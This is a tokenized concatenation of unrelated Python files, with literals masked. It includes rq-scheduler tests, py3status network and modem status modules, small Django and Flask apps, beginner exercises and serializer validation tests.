assertEqual ( <NUM_LIT:1> , len ( w ) ) <EOL> self . assertEqual ( w [ <NUM_LIT:0> ] . category , DeprecationWarning ) <EOL> def test_enqueue_periodic ( self ) : <EOL> """<STR_LIT>""" <EOL> with warnings . catch_warnings ( record = True ) as w : <EOL> warnings . simplefilter ( "<STR_LIT>" ) <EOL> job = self . scheduler . enqueue_periodic ( datetime . utcnow ( ) , <NUM_LIT:1> , None , say_hello ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( w ) ) <EOL> self . assertEqual ( w [ <NUM_LIT:0> ] . category , DeprecationWarning ) <EOL> def test_interval_and_repeat_persisted_correctly ( self ) : <EOL> """<STR_LIT>""" <EOL> job = self . scheduler . schedule ( datetime . utcnow ( ) , say_hello , interval = <NUM_LIT:10> , repeat = <NUM_LIT:11> ) <EOL> job_from_queue = Job . fetch ( job . id , connection = self . testconn ) <EOL> self . assertEqual ( job_from_queue . meta [ '<STR_LIT>' ] , <NUM_LIT:10> ) <EOL> self . assertEqual ( job_from_queue . meta [ '<STR_LIT>' ] , <NUM_LIT:11> ) <EOL> def test_crontab_persisted_correctly ( self ) : <EOL> """<STR_LIT>""" <EOL> job = self . scheduler . cron ( "<STR_LIT>" , say_hello ) <EOL> job_from_queue = Job . fetch ( job . id , connection = self . testconn ) <EOL> self . assertEqual ( job_from_queue . meta [ '<STR_LIT>' ] , "<STR_LIT>" ) <EOL> unix_time = self . testconn . zscore ( self . scheduler . scheduled_jobs_key , job . id ) <EOL> datetime_time = from_unix ( unix_time ) <EOL> assert datetime_time . minute == <NUM_LIT:1> <EOL> assert datetime_time . second == <NUM_LIT:0> <EOL> assert datetime_time - datetime . utcnow ( ) < timedelta ( hours = <NUM_LIT:1> ) <EOL> def test_crontab_sets_id ( self ) : <EOL> """<STR_LIT>""" <EOL> job_id = "<STR_LIT>" <EOL> job = self . scheduler . cron ( "<STR_LIT>" , say_hello , id = job_id ) <EOL> job_from_queue = Job . fetch ( job . id , connection = self . testconn ) <EOL> self . assertEqual ( job_id , job_from_queue . 
id ) <EOL> def test_repeat_without_interval_raises_error ( self ) : <EOL> def create_job ( ) : <EOL> self . scheduler . schedule ( datetime . utcnow ( ) , say_hello , repeat = <NUM_LIT:11> ) <EOL> self . assertRaises ( ValueError , create_job ) <EOL> def test_job_with_intervals_get_rescheduled ( self ) : <EOL> """<STR_LIT>""" <EOL> time_now = datetime . utcnow ( ) <EOL> interval = <NUM_LIT:10> <EOL> job = self . scheduler . schedule ( time_now , say_hello , interval = interval ) <EOL> self . scheduler . enqueue_job ( job ) <EOL> self . assertIn ( job . id , <EOL> tl ( self . testconn . zrange ( self . scheduler . scheduled_jobs_key , <NUM_LIT:0> , <NUM_LIT:1> ) ) ) <EOL> self . assertEqual ( self . testconn . zscore ( self . scheduler . scheduled_jobs_key , job . id ) , <EOL> to_unix ( time_now ) + interval ) <EOL> job = self . scheduler . enqueue_periodic ( time_now , interval , None , say_hello ) <EOL> self . scheduler . enqueue_job ( job ) <EOL> self . assertIn ( job . id , <EOL> tl ( self . testconn . zrange ( self . scheduler . scheduled_jobs_key , <NUM_LIT:0> , <NUM_LIT:1> ) ) ) <EOL> self . assertEqual ( self . testconn . zscore ( self . scheduler . scheduled_jobs_key , job . id ) , <EOL> to_unix ( time_now ) + interval ) <EOL> def test_job_with_crontab_get_rescheduled ( self ) : <EOL> job = self . scheduler . cron ( "<STR_LIT>" , say_hello ) <EOL> old_next_scheduled_time = self . testconn . zscore ( self . scheduler . scheduled_jobs_key , job . id ) <EOL> job . meta [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> self . scheduler . enqueue_job ( job ) <EOL> self . assertIn ( job . id , <EOL> tl ( self . testconn . zrange ( self . scheduler . scheduled_jobs_key , <NUM_LIT:0> , <NUM_LIT:1> ) ) ) <EOL> self . assertNotEqual ( old_next_scheduled_time , <EOL> self . testconn . zscore ( self . scheduler . scheduled_jobs_key , job . id ) ) <EOL> expected_next_scheduled_time = to_unix ( get_next_scheduled_time ( "<STR_LIT>" ) ) <EOL> self . assertEqual ( self . testconn . 
zscore ( self . scheduler . scheduled_jobs_key , job . id ) , <EOL> expected_next_scheduled_time ) <EOL> def test_job_with_repeat ( self ) : <EOL> """<STR_LIT>""" <EOL> time_now = datetime . utcnow ( ) <EOL> interval = <NUM_LIT:10> <EOL> job = self . scheduler . schedule ( time_now , say_hello , interval = interval , repeat = <NUM_LIT:1> ) <EOL> self . scheduler . enqueue_job ( job ) <EOL> self . assertNotIn ( job . id , <EOL> tl ( self . testconn . zrange ( self . scheduler . scheduled_jobs_key , <NUM_LIT:0> , <NUM_LIT:1> ) ) ) <EOL> job = self . scheduler . schedule ( time_now , say_hello , interval = interval , repeat = <NUM_LIT:2> ) <EOL> self . scheduler . enqueue_job ( job ) <EOL> self . assertIn ( job . id , <EOL> tl ( self . testconn . zrange ( self . scheduler . scheduled_jobs_key , <NUM_LIT:0> , <NUM_LIT:1> ) ) ) <EOL> self . scheduler . enqueue_job ( job ) <EOL> self . assertNotIn ( job . id , <EOL> tl ( self . testconn . zrange ( self . scheduler . scheduled_jobs_key , <NUM_LIT:0> , <NUM_LIT:1> ) ) ) <EOL> time_now = datetime . utcnow ( ) <EOL> job = self . scheduler . enqueue_periodic ( time_now , interval , <NUM_LIT:1> , say_hello ) <EOL> self . scheduler . enqueue_job ( job ) <EOL> self . assertNotIn ( job . id , <EOL> tl ( self . testconn . zrange ( self . scheduler . scheduled_jobs_key , <NUM_LIT:0> , <NUM_LIT:1> ) ) ) <EOL> job = self . scheduler . enqueue_periodic ( time_now , interval , <NUM_LIT:2> , say_hello ) <EOL> self . scheduler . enqueue_job ( job ) <EOL> self . assertIn ( job . id , <EOL> tl ( self . testconn . zrange ( self . scheduler . scheduled_jobs_key , <NUM_LIT:0> , <NUM_LIT:1> ) ) ) <EOL> self . scheduler . enqueue_job ( job ) <EOL> self . assertNotIn ( job . id , <EOL> tl ( self . testconn . zrange ( self . scheduler . scheduled_jobs_key , <NUM_LIT:0> , <NUM_LIT:1> ) ) ) <EOL> def test_missing_jobs_removed_from_scheduler ( self ) : <EOL> """<STR_LIT>""" <EOL> job = self . scheduler . schedule ( datetime . 
utcnow ( ) , say_hello ) <EOL> job . cancel ( ) <EOL> self . scheduler . get_jobs_to_queue ( ) <EOL> self . assertNotIn ( job . id , tl ( self . testconn . zrange ( <EOL> self . scheduler . scheduled_jobs_key , <NUM_LIT:0> , <NUM_LIT:1> ) ) ) <EOL> def test_periodic_jobs_sets_result_ttl ( self ) : <EOL> """<STR_LIT>""" <EOL> job = self . scheduler . schedule ( datetime . utcnow ( ) , say_hello , interval = <NUM_LIT:5> ) <EOL> job_from_queue = Job . fetch ( job . id , connection = self . testconn ) <EOL> self . assertEqual ( job . result_ttl , - <NUM_LIT:1> ) <EOL> def test_periodic_jobs_sets_ttl ( self ) : <EOL> """<STR_LIT>""" <EOL> job = self . scheduler . schedule ( datetime . utcnow ( ) , say_hello , interval = <NUM_LIT:5> , ttl = <NUM_LIT:4> ) <EOL> job_from_queue = Job . fetch ( job . id , connection = self . testconn ) <EOL> self . assertEqual ( job . ttl , <NUM_LIT:4> ) <EOL> def test_periodic_job_sets_id ( self ) : <EOL> """<STR_LIT>""" <EOL> job = self . scheduler . schedule ( datetime . utcnow ( ) , say_hello , interval = <NUM_LIT:5> , id = '<STR_LIT>' ) <EOL> job_from_queue = Job . fetch ( job . id , connection = self . testconn ) <EOL> self . assertEqual ( '<STR_LIT>' , job . id ) <EOL> def test_periodic_job_sets_description ( self ) : <EOL> """<STR_LIT>""" <EOL> job = self . scheduler . schedule ( datetime . utcnow ( ) , say_hello , interval = <NUM_LIT:5> , description = '<STR_LIT:description>' ) <EOL> job_from_queue = Job . fetch ( job . id , connection = self . testconn ) <EOL> self . assertEqual ( '<STR_LIT:description>' , job . description ) <EOL> def test_run ( self ) : <EOL> """<STR_LIT>""" <EOL> def send_stop_signal ( ) : <EOL> """<STR_LIT>""" <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> os . kill ( os . getpid ( ) , signal . SIGINT ) <EOL> thread = Thread ( target = send_stop_signal ) <EOL> thread . start ( ) <EOL> self . assertRaises ( SystemExit , self . scheduler . run ) <EOL> thread . 
join ( ) <EOL> def test_scheduler_w_o_explicit_connection ( self ) : <EOL> """<STR_LIT>""" <EOL> s = Scheduler ( ) <EOL> self . assertEqual ( s . connection , self . testconn ) <EOL> def test_small_float_interval ( self ) : <EOL> """<STR_LIT>""" <EOL> key = Scheduler . scheduler_key <EOL> self . assertNotIn ( key , tl ( self . testconn . keys ( '<STR_LIT:*>' ) ) ) <EOL> scheduler = Scheduler ( connection = self . testconn , interval = <NUM_LIT:0.1> ) <EOL> self . assertEqual ( scheduler . _interval , <NUM_LIT:0.1> ) <EOL> scheduler . register_birth ( ) <EOL> self . assertIn ( key , tl ( self . testconn . keys ( '<STR_LIT:*>' ) ) ) <EOL> self . assertEqual ( self . testconn . ttl ( key ) , <NUM_LIT:10> ) <EOL> self . assertFalse ( self . testconn . hexists ( key , '<STR_LIT>' ) ) <EOL> now = datetime . utcnow ( ) <EOL> job = scheduler . enqueue_at ( now , say_hello ) <EOL> self . assertIn ( job , self . scheduler . get_jobs_to_queue ( ) ) <EOL> self . assertEqual ( len ( self . scheduler . get_jobs ( ) ) , <NUM_LIT:1> ) <EOL> scheduler . register_death ( ) <EOL> def send_stop_signal ( ) : <EOL> """<STR_LIT>""" <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> os . kill ( os . getpid ( ) , signal . SIGINT ) <EOL> thread = Thread ( target = send_stop_signal ) <EOL> thread . start ( ) <EOL> self . assertRaises ( SystemExit , scheduler . run ) <EOL> thread . join ( ) <EOL> self . assertEqual ( len ( scheduler . get_jobs ( ) ) , <NUM_LIT:0> ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division <EOL> from time import time <EOL> INITIAL_MULTI = <NUM_LIT> <EOL> MULTIPLIER_TOP = <NUM_LIT> <EOL> UNIT_MULTI = <NUM_LIT> <EOL> UNITS = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , ] <EOL> class Py3status : <EOL> """<STR_LIT:U+0020>""" <EOL> all_interfaces = True <EOL> cache_timeout = <NUM_LIT:2> <EOL> devfile = '<STR_LIT>' <EOL> format = "<STR_LIT>" <EOL> format_no_connection = '<STR_LIT>' <EOL> hide_if_zero = False <EOL> interfaces = '<STR_LIT>' <EOL> interfaces_blacklist = '<STR_LIT>' <EOL> precision = <NUM_LIT:1> <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . last_interface = None <EOL> self . last_stat = self . _get_stat ( ) <EOL> self . last_time = time ( ) <EOL> def currentSpeed ( self , i3s_output_list , i3s_config ) : <EOL> if not isinstance ( self . interfaces , list ) : <EOL> self . interfaces = self . interfaces . split ( '<STR_LIT:U+002C>' ) <EOL> if not isinstance ( self . interfaces_blacklist , list ) : <EOL> self . interfaces_blacklist = self . interfaces_blacklist . split ( '<STR_LIT:U+002C>' ) <EOL> if self . precision > <NUM_LIT:0> : <EOL> self . left_align = len ( str ( MULTIPLIER_TOP ) ) + <NUM_LIT:1> + self . precision <EOL> else : <EOL> self . left_align = len ( str ( MULTIPLIER_TOP ) ) <EOL> self . value_format = "<STR_LIT>" % ( self . left_align , self . precision ) <EOL> ns = self . _get_stat ( ) <EOL> deltas = { } <EOL> try : <EOL> timedelta = time ( ) - self . last_time <EOL> for old , new in zip ( self . last_stat , ns ) : <EOL> down = int ( new [ <NUM_LIT:1> ] ) - int ( old [ <NUM_LIT:1> ] ) <EOL> up = int ( new [ <NUM_LIT:9> ] ) - int ( old [ <NUM_LIT:9> ] ) <EOL> down /= timedelta * INITIAL_MULTI <EOL> up /= timedelta * INITIAL_MULTI <EOL> deltas [ new [ <NUM_LIT:0> ] ] = { '<STR_LIT>' : up + down , '<STR_LIT>' : up , '<STR_LIT>' : down , } <EOL> self . last_stat = self . _get_stat ( ) <EOL> self . 
last_time = time ( ) <EOL> interface = max ( deltas , key = lambda x : deltas [ x ] [ '<STR_LIT>' ] ) <EOL> if deltas [ interface ] [ '<STR_LIT>' ] == <NUM_LIT:0> : <EOL> interface = self . last_interface <EOL> hide = self . hide_if_zero <EOL> else : <EOL> self . last_interface = interface <EOL> hide = False <EOL> delta = deltas [ interface ] if interface else None <EOL> except TypeError : <EOL> delta = None <EOL> interface = None <EOL> hide = self . hide_if_zero <EOL> return { <EOL> '<STR_LIT>' : time ( ) + self . cache_timeout , <EOL> '<STR_LIT>' : "<STR_LIT>" if hide else <EOL> self . format . format ( <EOL> total = self . _divide_and_format ( delta [ '<STR_LIT>' ] ) , <EOL> up = self . _divide_and_format ( delta [ '<STR_LIT>' ] ) , <EOL> down = self . _divide_and_format ( delta [ '<STR_LIT>' ] ) , <EOL> interface = interface [ : - <NUM_LIT:1> ] , <EOL> ) if interface else self . format_no_connection <EOL> } <EOL> def _get_stat ( self ) : <EOL> """<STR_LIT>""" <EOL> def dev_filter ( x ) : <EOL> x = x . strip ( ) . split ( "<STR_LIT:U+0020>" ) [ <NUM_LIT:0> ] [ : - <NUM_LIT:1> ] <EOL> if x in self . interfaces_blacklist : <EOL> return False <EOL> if self . all_interfaces : <EOL> return True <EOL> if x in self . interfaces : <EOL> return True <EOL> return False <EOL> x = filter ( dev_filter , open ( self . devfile ) . readlines ( ) [ <NUM_LIT:2> : ] ) <EOL> try : <EOL> return [ list ( filter ( lambda x : x , _x . split ( "<STR_LIT:U+0020>" ) ) ) for _x in x ] <EOL> except StopIteration : <EOL> return None <EOL> def _divide_and_format ( self , value ) : <EOL> """<STR_LIT>""" <EOL> for i , unit in enumerate ( UNITS ) : <EOL> if value > MULTIPLIER_TOP : <EOL> value /= UNIT_MULTI <EOL> else : <EOL> break <EOL> return self . value_format . 
format ( value = value , unit = unit ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> """<STR_LIT>""" <EOL> from time import sleep <EOL> x = Py3status ( ) <EOL> config = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> while True : <EOL> print ( x . currentSpeed ( [ ] , config ) ) <EOL> sleep ( <NUM_LIT:1> ) </s>
<s> """<STR_LIT>""" <EOL> import netifaces as ni <EOL> import os <EOL> import stat <EOL> import serial <EOL> from time import time , sleep <EOL> class Py3status : <EOL> baudrate = <NUM_LIT> <EOL> cache_timeout = <NUM_LIT:5> <EOL> consider_3G_degraded = False <EOL> format_down = '<STR_LIT>' <EOL> format_error = '<STR_LIT>' <EOL> format_no_service = '<STR_LIT>' <EOL> format_up = '<STR_LIT>' <EOL> interface = "<STR_LIT>" <EOL> modem = "<STR_LIT>" <EOL> modem_timeout = <NUM_LIT> <EOL> def wwan_status ( self , i3s_output_list , i3s_config ) : <EOL> query = "<STR_LIT>" <EOL> target_line = "<STR_LIT>" <EOL> if self . consider_3G_degraded : <EOL> degraded_netgen = <NUM_LIT:3> <EOL> else : <EOL> degraded_netgen = <NUM_LIT:2> <EOL> response = { } <EOL> response [ '<STR_LIT>' ] = time ( ) + self . cache_timeout <EOL> if os . path . exists ( self . modem ) and stat . S_ISCHR ( os . stat ( <EOL> self . modem ) . st_mode ) : <EOL> print ( "<STR_LIT>" + self . modem ) <EOL> try : <EOL> ser = serial . Serial ( <EOL> port = self . modem , <EOL> baudrate = self . baudrate , <EOL> parity = serial . PARITY_ODD , <EOL> stopbits = serial . STOPBITS_ONE , <EOL> bytesize = serial . EIGHTBITS ) <EOL> if ser . isOpen ( ) : <EOL> ser . close ( ) <EOL> ser . open ( ) <EOL> ser . write ( ( query + "<STR_LIT:\r>" ) . encode ( ) ) <EOL> print ( "<STR_LIT>" + self . modem ) <EOL> sleep ( self . modem_timeout ) <EOL> n = ser . inWaiting ( ) <EOL> modem_response = ser . read ( n ) <EOL> ser . close ( ) <EOL> except : <EOL> print ( "<STR_LIT>" ) <EOL> response [ '<STR_LIT>' ] = self . format_error . format ( <EOL> error = "<STR_LIT>" + self . modem ) <EOL> response [ '<STR_LIT>' ] = i3s_config [ '<STR_LIT>' ] <EOL> return response <EOL> for line in modem_response . decode ( "<STR_LIT:utf-8>" ) . split ( '<STR_LIT:\n>' ) : <EOL> print ( line ) <EOL> if line . startswith ( target_line ) : <EOL> ip = self . _get_ip ( self . 
interface ) <EOL> if not ip : <EOL> ip = "<STR_LIT>" <EOL> modem_answer = line . split ( '<STR_LIT:U+002C>' ) <EOL> netgen = len ( modem_answer [ - <NUM_LIT:2> ] ) + <NUM_LIT:1> <EOL> netmode = modem_answer [ - <NUM_LIT:1> ] . rstrip ( ) [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> if netmode == "<STR_LIT>" : <EOL> response [ '<STR_LIT>' ] = self . format_no_service . format ( <EOL> status = netmode , <EOL> ip = ip ) <EOL> response [ '<STR_LIT>' ] = i3s_config [ '<STR_LIT>' ] <EOL> else : <EOL> response [ '<STR_LIT>' ] = self . format_up . format ( <EOL> status = netmode , <EOL> netgen = str ( netgen ) + "<STR_LIT>" , <EOL> ip = ip ) <EOL> if netgen <= degraded_netgen : <EOL> response [ '<STR_LIT>' ] = i3s_config [ '<STR_LIT>' ] <EOL> else : <EOL> response [ '<STR_LIT>' ] = i3s_config [ '<STR_LIT>' ] <EOL> elif line . startswith ( "<STR_LIT>" ) or line . startswith ( <EOL> "<STR_LIT>" ) : <EOL> response [ '<STR_LIT>' ] = i3s_config [ '<STR_LIT>' ] <EOL> response [ '<STR_LIT>' ] = self . format_error . format ( <EOL> error = "<STR_LIT>" ) <EOL> else : <EOL> pass <EOL> else : <EOL> print ( self . modem + "<STR_LIT>" ) <EOL> response [ '<STR_LIT>' ] = i3s_config [ '<STR_LIT>' ] <EOL> response [ '<STR_LIT>' ] = self . format_down <EOL> return response <EOL> def _get_ip ( self , interface ) : <EOL> """<STR_LIT>""" <EOL> if interface in ni . interfaces ( ) : <EOL> addresses = ni . ifaddresses ( interface ) <EOL> if ni . AF_INET in addresses : <EOL> return addresses [ ni . AF_INET ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> return "<STR_LIT>" <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> x = Py3status ( ) <EOL> config = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> while True : <EOL> print ( x . wwan_status ( [ ] , config ) ) <EOL> sleep ( <NUM_LIT:1> ) </s>
<s> from django . db import models <EOL> from django . contrib . auth . models import AbstractUser <EOL> class BadgifyUser ( AbstractUser ) : <EOL> love_python = models . BooleanField ( default = False ) <EOL> love_js = models . BooleanField ( default = False ) <EOL> love_java = models . BooleanField ( default = False ) </s>
<s> import django <EOL> from django . conf import settings <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> if django . VERSION >= ( <NUM_LIT:1> , <NUM_LIT:5> ) : <EOL> update_fields = lambda instance , fields : instance . save ( update_fields = fields ) <EOL> from django . contrib . auth import get_user_model <EOL> else : <EOL> update_fields = lambda instance , fields : instance . save ( ) <EOL> def get_user_model ( ) : <EOL> from django . contrib . auth . models import User <EOL> return User <EOL> AUTH_USER_MODEL = getattr ( settings , '<STR_LIT>' , '<STR_LIT>' ) </s>
<s> from django . utils . encoding import python_2_unicode_compatible <EOL> from django . utils . functional import cached_property <EOL> def _get_translation_field_names ( ) : <EOL> """<STR_LIT>""" <EOL> from . models import Translation <EOL> fields = Translation . _meta . get_all_field_names ( ) <EOL> fields . remove ( '<STR_LIT:id>' ) <EOL> return fields <EOL> try : <EOL> from django . utils . lru_cache import lru_cache <EOL> get_translation_field_names = lru_cache ( ) ( _get_translation_field_names ) <EOL> except ImportError : <EOL> from django . utils . functional import memoize <EOL> get_translation_field_names = memoize ( _get_translation_field_names , { } , <NUM_LIT:0> ) <EOL> @ python_2_unicode_compatible <EOL> class CachedTranslation ( object ) : <EOL> def __init__ ( self , ** kwargs ) : <EOL> self . fields = get_translation_field_names ( ) <EOL> attrs = self . fields + [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> for attr in attrs : <EOL> setattr ( self , attr , None ) <EOL> self . __dict__ . update ( ** kwargs ) <EOL> self . is_new = True <EOL> self . has_changed = False <EOL> if self . instance is not None : <EOL> self . identifier = self . instance . linguist_identifier <EOL> self . object_id = self . instance . pk <EOL> if self . translation is not None : <EOL> self . is_new = bool ( self . translation . pk is None ) <EOL> for attr in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> setattr ( self , attr , getattr ( self . translation , attr ) ) <EOL> @ cached_property <EOL> def attrs ( self ) : <EOL> """<STR_LIT>""" <EOL> return dict ( ( k , getattr ( self , k ) ) for k in self . fields ) <EOL> @ cached_property <EOL> def lookup ( self ) : <EOL> """<STR_LIT>""" <EOL> lookup = dict ( ( k , getattr ( self , k ) ) for k in self . fields ) <EOL> lookup . 
pop ( '<STR_LIT>' ) <EOL> return lookup <EOL> @ classmethod <EOL> def from_object ( cls , obj ) : <EOL> """<STR_LIT>""" <EOL> instance = cls ( ** dict ( ( field , getattr ( obj , field ) ) <EOL> for field in get_translation_field_names ( ) ) ) <EOL> instance . is_new = False <EOL> return instance <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' % ( <EOL> self . identifier , <EOL> self . object_id , <EOL> self . field_name , <EOL> self . language ) </s>
<s> version = ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> ) <EOL> __version__ = '<STR_LIT:.>' . join ( map ( str , version ) ) <EOL> default_app_config = '<STR_LIT>' <EOL> __all__ = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:version>' , <EOL> ] </s>
<s> from services import root_dir , nice_json <EOL> from flask import Flask <EOL> from werkzeug . exceptions import NotFound <EOL> import json <EOL> app = Flask ( __name__ ) <EOL> with open ( "<STR_LIT>" . format ( root_dir ( ) ) , "<STR_LIT:r>" ) as f : <EOL> showtimes = json . load ( f ) <EOL> @ app . route ( "<STR_LIT:/>" , methods = [ '<STR_LIT:GET>' ] ) <EOL> def hello ( ) : <EOL> return nice_json ( { <EOL> "<STR_LIT>" : "<STR_LIT:/>" , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> } ) <EOL> @ app . route ( "<STR_LIT>" , methods = [ '<STR_LIT:GET>' ] ) <EOL> def showtimes_list ( ) : <EOL> return nice_json ( showtimes ) <EOL> @ app . route ( "<STR_LIT>" , methods = [ '<STR_LIT:GET>' ] ) <EOL> def showtimes_record ( date ) : <EOL> if date not in showtimes : <EOL> raise NotFound <EOL> print showtimes [ date ] <EOL> return nice_json ( showtimes [ date ] ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> app . run ( port = <NUM_LIT> , debug = True ) </s>
<s> class Car ( object ) : <EOL> condition = "<STR_LIT>" <EOL> def __init__ ( self , model , color , mpg ) : <EOL> self . model = model <EOL> self . color = color <EOL> self . mpg = mpg <EOL> def display_car ( self ) : <EOL> return "<STR_LIT>" % ( self . color , self . model , str ( self . mpg ) ) <EOL> my_car = Car ( "<STR_LIT>" , "<STR_LIT>" , <NUM_LIT> ) <EOL> print my_car . display_car ( ) </s>
<s> from datetime import datetime <EOL> print datetime . datetime </s>
<s> zoo_animals = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> del zoo_animals [ '<STR_LIT>' ] <EOL> del zoo_animals [ '<STR_LIT>' ] <EOL> del zoo_animals [ '<STR_LIT>' ] <EOL> zoo_animals [ '<STR_LIT>' ] = <NUM_LIT:2> <EOL> print zoo_animals </s>
<s> lloyd = { <EOL> "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> "<STR_LIT>" : [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> "<STR_LIT>" : [ <NUM_LIT> , <NUM_LIT> ] <EOL> } <EOL> alice = { <EOL> "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> "<STR_LIT>" : [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> "<STR_LIT>" : [ <NUM_LIT> , <NUM_LIT> ] <EOL> } <EOL> tyler = { <EOL> "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> "<STR_LIT>" : [ <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ] , <EOL> "<STR_LIT>" : [ <NUM_LIT> , <NUM_LIT> ] <EOL> } <EOL> def average ( numbers ) : <EOL> total = sum ( numbers ) <EOL> total = float ( total ) / float ( len ( numbers ) ) <EOL> return total </s>
<s> from random import randint <EOL> board = [ ] <EOL> for x in range ( <NUM_LIT:0> , <NUM_LIT:5> ) : <EOL> board . append ( [ "<STR_LIT:O>" ] * <NUM_LIT:5> ) <EOL> def print_board ( board ) : <EOL> for row in board : <EOL> print "<STR_LIT:U+0020>" . join ( row ) <EOL> print_board ( board ) <EOL> def random_row ( board ) : <EOL> return randint ( <NUM_LIT:0> , len ( board ) - <NUM_LIT:1> ) <EOL> def random_col ( board ) : <EOL> return randint ( <NUM_LIT:0> , len ( board [ <NUM_LIT:0> ] ) - <NUM_LIT:1> ) <EOL> ship_row = random_row ( board ) <EOL> ship_col = random_col ( board ) <EOL> guess_row = int ( raw_input ( "<STR_LIT>" ) ) <EOL> guess_col = int ( raw_input ( "<STR_LIT>" ) ) <EOL> print ship_row <EOL> print ship_col <EOL> if guess_row == ship_row and guess_col == ship_col : <EOL> print "<STR_LIT>" </s>
<s> def digit_sum ( n ) : <EOL> b = [ ] <EOL> n = str ( n ) <EOL> for a in n : <EOL> a = int ( a ) <EOL> b . append ( a ) <EOL> return sum ( b ) <EOL> print sum ( b ) </s>
<s> import os <EOL> import sys <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> os . environ . setdefault ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> from django . core . management import execute_from_command_line <EOL> execute_from_command_line ( sys . argv ) </s>
<s> from __future__ import unicode_literals <EOL> from django . test import TestCase <EOL> from rest_framework import serializers <EOL> from rest_framework_mongoengine . serializers import DocumentSerializer <EOL> from . models import DumbDocument <EOL> class ValidationMethodSerializer ( DocumentSerializer ) : <EOL> class Meta : <EOL> model = DumbDocument <EOL> def validate_name ( self , value ) : <EOL> if len ( value ) < <NUM_LIT:3> : <EOL> raise serializers . ValidationError ( '<STR_LIT>' ) <EOL> return value . title ( ) <EOL> class RenamedValidationMethodSerializer ( DocumentSerializer ) : <EOL> class Meta : <EOL> model = DumbDocument <EOL> renamed = serializers . CharField ( source = '<STR_LIT:name>' , required = False ) <EOL> def validate_renamed ( self , value ) : <EOL> if len ( value ) < <NUM_LIT:3> : <EOL> raise serializers . ValidationError ( '<STR_LIT>' ) <EOL> return value . title ( ) <EOL> def custom_field_validator ( value ) : <EOL> if len ( value ) < <NUM_LIT:3> : <EOL> raise serializers . ValidationError ( '<STR_LIT>' ) <EOL> class FieldValidatorSerializer ( DocumentSerializer ) : <EOL> class Meta : <EOL> model = DumbDocument <EOL> name = serializers . CharField ( validators = [ custom_field_validator ] ) <EOL> def custom_model_validator ( data ) : <EOL> if len ( data [ '<STR_LIT:name>' ] ) < <NUM_LIT:3> : <EOL> raise serializers . ValidationError ( '<STR_LIT>' ) <EOL> class ModelValidatorSerializer ( DocumentSerializer ) : <EOL> class Meta : <EOL> model = DumbDocument <EOL> validators = [ custom_model_validator ] <EOL> class TestValidating ( TestCase ) : <EOL> def test_validation_method_is_executed ( self ) : <EOL> serializer = ValidationMethodSerializer ( data = { '<STR_LIT:name>' : "<STR_LIT>" } ) <EOL> assert not serializer . is_valid ( ) <EOL> assert '<STR_LIT:name>' in serializer . 
errors <EOL> def test_validation_method_passing ( self ) : <EOL> serializer = ValidationMethodSerializer ( data = { '<STR_LIT:name>' : "<STR_LIT:foo>" } ) <EOL> assert serializer . is_valid ( ) , serializer . errors <EOL> assert serializer . validated_data [ '<STR_LIT:name>' ] == "<STR_LIT>" <EOL> def test_renamed_validation_method_is_executed ( self ) : <EOL> serializer = RenamedValidationMethodSerializer ( data = { '<STR_LIT>' : "<STR_LIT>" } ) <EOL> assert not serializer . is_valid ( ) <EOL> assert '<STR_LIT>' in serializer . errors <EOL> def test_renamed_validation_method_passing ( self ) : <EOL> serializer = RenamedValidationMethodSerializer ( data = { '<STR_LIT>' : "<STR_LIT:foo>" } ) <EOL> assert serializer . is_valid ( ) , serializer . errors <EOL> assert serializer . validated_data [ '<STR_LIT:name>' ] == "<STR_LIT>" <EOL> def test_validator_is_executed ( self ) : <EOL> serializer = FieldValidatorSerializer ( data = { '<STR_LIT:name>' : "<STR_LIT>" } ) <EOL> assert not serializer . is_valid ( ) <EOL> assert '<STR_LIT:name>' in serializer . errors <EOL> def test_validator_passing ( self ) : <EOL> serializer = FieldValidatorSerializer ( data = { '<STR_LIT:name>' : "<STR_LIT:foo>" } ) <EOL> assert serializer . is_valid ( ) , serializer . errors <EOL> def test_validators_is_executed ( self ) : 